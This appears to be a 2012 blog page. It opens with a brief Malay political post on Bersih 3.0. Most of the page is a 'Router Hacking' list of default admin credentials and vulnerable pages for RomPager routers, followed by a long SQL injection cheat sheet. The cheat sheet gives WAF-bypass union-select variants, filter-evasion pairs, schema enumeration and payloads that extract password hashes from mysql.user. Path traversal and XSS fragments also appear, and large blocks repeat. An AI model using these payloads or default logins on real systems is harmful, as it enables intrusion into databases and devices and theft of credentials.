Pages
▼
Monday, March 26, 2012
bersih 3.0,pakatan rakyat,ambiga,anuar ibrahim
Pada 28.4.2012 bersih 3.0 dan pakatan rakyat diketuai oleh pengerusi oleh ambiga dalangnya anuar ibrahim ketua atau wakil melayu untuk dipecah belahkan.bersih 3.0 dan bersih 2.0 akan tiba bersih 4.0. sama juga Bersih 2.0 dan Bersih 3.0 menjelang Bersih 4.0. lapan tuntutan dan 8 tuntutan bersih 3.0
Thursday, March 1, 2012
Router Hacking
#HTTP BANNER=RomPager/4.07 UPnP/1.0
LOGIN=admin:admin
BUGS=wizard/wizardPPP.htm
HTTP BANNER=RomPager/4.51 UPnP/1.0
LOGIN=tmadmin:tmadmin/tmuser:tmuser
BUGS=wzWAN_ManualCfg.html
LOGIN=admin:admin
BUGS=wizard/wizardPPP.htm
HTTP BANNER=RomPager/4.51 UPnP/1.0
LOGIN=tmadmin:tmadmin/tmuser:tmuser
BUGS=wzWAN_ManualCfg.html
[SQLi] Cheat Sheet
group_concat(version(),0x3a,database())
##############################################
group_concat(schema_name)
from information_schema.schemata
##############################################
group_concat(table_name)
.tables where table_schema=database()
##############################################
group_concat(column_name)
.columns where table_schema=database()
##############################################
group_concat(schema_name)
from information_schema.schemata
##############################################
group_concat(table_name)
.tables where table_schema=database()
##############################################
group_concat(column_name)
.columns where table_schema=database()
[SQLi] Union Select/Union All Select
/*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/
UNION SELECT
/*!UNION*/ +/*!ALL*/+/*!SELECT*/
/*!UNION*/ /*!SELECT*/
uNiOn SeLeCt
id=1' /*!12345union*/ select
UNIunionON SEselectLECT
/!*unioN*/ /*!SeLECT*/
and 1=2 union select
/**//*!union*//**//*!sElect*//**//*!aLl*//**/
/*!union*/+/*!select*/+/*!all*/
union select = %2f**/union%2f**/select
/*!UniON*/+/*!SelEct*/
and 1=2 union select
and 1=1 union select
SELECT * FROM articles WHERE id='-1' or 1=1
(0)union(select(table_name),column_name,…
0/**/union/*!50000select*/table_name`foo`/**/…
0%a0union%a0select%09group_concat(table_name)….
0′union all select all`table_name`foo from`information_schema`. `tables`
/*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/+1,2,3,4,5,6,7--
/**/uNiOn/**/SelEct/**/+1,2,3,4,5,6,7--
/*!UNION*/+/*!SELECT*/+1,2,3,4,5-
/**/union/**/select/**/+1,2,3,4,5--
id=1+union+select...
id=1+(UnIoN)+(SelECT)+
id=1+(UnIoN+SeLeCT)+
id=1+(UnI)(oN)+(SeL)(EcT)
id=1+’UnI”On’+'SeL”ECT’
id=1+’UnI’||’on’+SeLeCT’
id=“><script>...
id=/../../../etc/passwd
/(sel)(ect.+fr)(om)/is
/(uni)(on.+sel)(ect)/is
id=1; select 1,2,3
id=1/*union*/union/*select*/select+1,2,3/*
id=1/*uniX on*/union/*selX ect*/select+1,2,3/*
id=1+un/**/ion+sel/**/ect+1,2,3--
id=1;select+1&id=2,3+from+users+where+id=1--
id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users
id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/users
a=1+union/*&b=*/select+1,2
?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--
id=1+OR+0x50=0x50
id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=
id=1+union+(select+1,2+from+users)
/?id=1+union+(select+'xz'from+xxx)
/?id=(1)union(select(1),mid(hash,1,32)from(users))
/?id=1+union+(select'1',concat(login,hash)from+users)
/?id=(1)union(((((((select(1),hex(hash)from(users))))))))
/?id=(1)or(0x50=0x50)
Forbid: /?id=1+union+select+user,password+from+mysql.user+where+user=1
But allows: /?id=1+union+select+user,password+from+mysql.user+limit+0,1
Forbid: /?id=1+OR+1=1
But allows: /?id=1+OR+0x50=0x50
Forbid: /?id=substring((1),1,1)
But allows: /?id=mid((1),1,1)
Forbid: /?id=1+and+ascii(lower(substring((select+pwd+from+users+limit+1,1),1,1)))=74
But allows: /?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
Forbid: /?id=1+OR+1=1
But allows: /?id=1+OR+0x50=0x50
Forbid: /?id=1+and+5=6
But allows: /?id=1+and+5!=6
Forbid: /?id=1;drop members
But allows: /?id=1;delete members
And allows: /?id=(1);exec('sel'+'ect(1)'+',(xxx)from'+'yyy')
UNION SELECT
/*!UNION*/ +/*!ALL*/+/*!SELECT*/
/*!UNION*/ /*!SELECT*/
uNiOn SeLeCt
id=1' /*!12345union*/ select
UNIunionON SEselectLECT
/!*unioN*/ /*!SeLECT*/
and 1=2 union select
/**//*!union*//**//*!sElect*//**//*!aLl*//**/
/*!union*/+/*!select*/+/*!all*/
union select = %2f**/union%2f**/select
/*!UniON*/+/*!SelEct*/
and 1=2 union select
and 1=1 union select
SELECT * FROM articles WHERE id='-1' or 1=1
(0)union(select(table_name),column_name,…
0/**/union/*!50000select*/table_name`foo`/**/…
0%a0union%a0select%09group_concat(table_name)….
0′union all select all`table_name`foo from`information_schema`. `tables`
/*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/+1,2,3,4,5,6,7--
/**/uNiOn/**/SelEct/**/+1,2,3,4,5,6,7--
/*!UNION*/+/*!SELECT*/+1,2,3,4,5-
/**/union/**/select/**/+1,2,3,4,5--
id=1+union+select...
id=1+(UnIoN)+(SelECT)+
id=1+(UnIoN+SeLeCT)+
id=1+(UnI)(oN)+(SeL)(EcT)
id=1+’UnI”On’+'SeL”ECT’
id=1+’UnI’||’on’+SeLeCT’
id=“><script>...
id=/../../../etc/passwd
/(sel)(ect.+fr)(om)/is
/(uni)(on.+sel)(ect)/is
id=1; select 1,2,3
id=1/*union*/union/*select*/select+1,2,3/*
id=1/*uniX on*/union/*selX ect*/select+1,2,3/*
id=1+un/**/ion+sel/**/ect+1,2,3--
id=1;select+1&id=2,3+from+users+where+id=1--
id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users
id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/users
a=1+union/*&b=*/select+1,2
?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--
id=1+OR+0x50=0x50
id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=
id=1+union+(select+1,2+from+users)
/?id=1+union+(select+'xz'from+xxx)
/?id=(1)union(select(1),mid(hash,1,32)from(users))
/?id=1+union+(select'1',concat(login,hash)from+users)
/?id=(1)union(((((((select(1),hex(hash)from(users))))))))
/?id=(1)or(0x50=0x50)
Forbid: /?id=1+union+select+user,password+from+mysql.user+where+user=1
But allows: /?id=1+union+select+user,password+from+mysql.user+limit+0,1
Forbid: /?id=1+OR+1=1
But allows: /?id=1+OR+0x50=0x50
Forbid: /?id=substring((1),1,1)
But allows: /?id=mid((1),1,1)
Forbid: /?id=1+and+ascii(lower(substring((select+pwd+from+users+limit+1,1),1,1)))=74
But allows: /?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
Forbid: /?id=1+OR+1=1
But allows: /?id=1+OR+0x50=0x50
Forbid: /?id=1+and+5=6
But allows: /?id=1+and+5!=6
Forbid: /?id=1;drop members
But allows: /?id=1;delete members
And allows: /?id=(1);exec('sel'+'ect(1)'+',(xxx)from'+'yyy')
[SQLi] Order By
AND substring(version(),1,1)=5
'+order+by+1
"+order+by+1/*
'+order+by+1'--
+order+by+1/*
'+or+1=1+order+by+999/*
'+or+'a'='a+order+by+999/*
+or+1=1/*+order+by+999/*
'+order+by+1
"+order+by+1/*
'+order+by+1'--
+order+by+1/*
'+or+1=1+order+by+999/*
'+or+'a'='a+order+by+999/*
+or+1=1/*+order+by+999/*
[SQLi] Group Concat
CoNcAt(version())
Group_Concat(table_name)
/*!group_concat(table_name)*/
/*!table_name*/
concat_ws(0x3a,user,password,host)
unhex(hex(concat_ws(0x3a,login,password )))
+or+1+group+by+concat
Group_Concat(table_name)
/*!group_concat(table_name)*/
/*!table_name*/
concat_ws(0x3a,user,password,host)
unhex(hex(concat_ws(0x3a,login,password )))
+or+1+group+by+concat
[SQLi] From Information Schema
/**//*!from*//**//*!information_schema.tables*//**//*!where*//**//*!table_schema=database()*/--+-
from /*!information_schema*/.tables
/*!from*/ /*!InfoRmation_SCHEMa*/.`tables`
information_schema.tables LIMIT 1 OFFSET 44
information_schema.columns where table_name=CHAR(105, 110, 102, 111)
from /*!information_schema*/.tables
/*!from*/ /*!InfoRmation_SCHEMa*/.`tables`
information_schema.tables LIMIT 1 OFFSET 44
information_schema.columns where table_name=CHAR(105, 110, 102, 111)
[SQLi] And/Or
+and 1=0-- -
+and 1=1-- -
+and '1'='1
+order+by+99999
+or+1=2
+and+1=2
'
"
\
/*
--+-
/**/
#####
'/*
"/*
'--
"--
';
";
--
;
‘ or 1=1#
‘ or 1=1–+-
‘ or 1=1/* (MySQL < 5.1)
' or 1=1;
' or 1=1 union select 1,2 as `
' or#newline
1='1
' or– -newline
1='1
' /*!50000or*/1='1
' /*!or*/1='1
+
–
~
!
‘ or –+2=- -!!!’2
‘||1=’1
‘&&1=’1
‘=’
‘-’
+and 1=1-- -
+and '1'='1
+order+by+99999
+or+1=2
+and+1=2
'
"
\
/*
--+-
/**/
#####
'/*
"/*
'--
"--
';
";
--
;
‘ or 1=1#
‘ or 1=1–+-
‘ or 1=1/* (MySQL < 5.1)
' or 1=1;
' or 1=1 union select 1,2 as `
' or#newline
1='1
' or– -newline
1='1
' /*!50000or*/1='1
' /*!or*/1='1
+
–
~
!
‘ or –+2=- -!!!’2
‘||1=’1
‘&&1=’1
‘=’
‘-’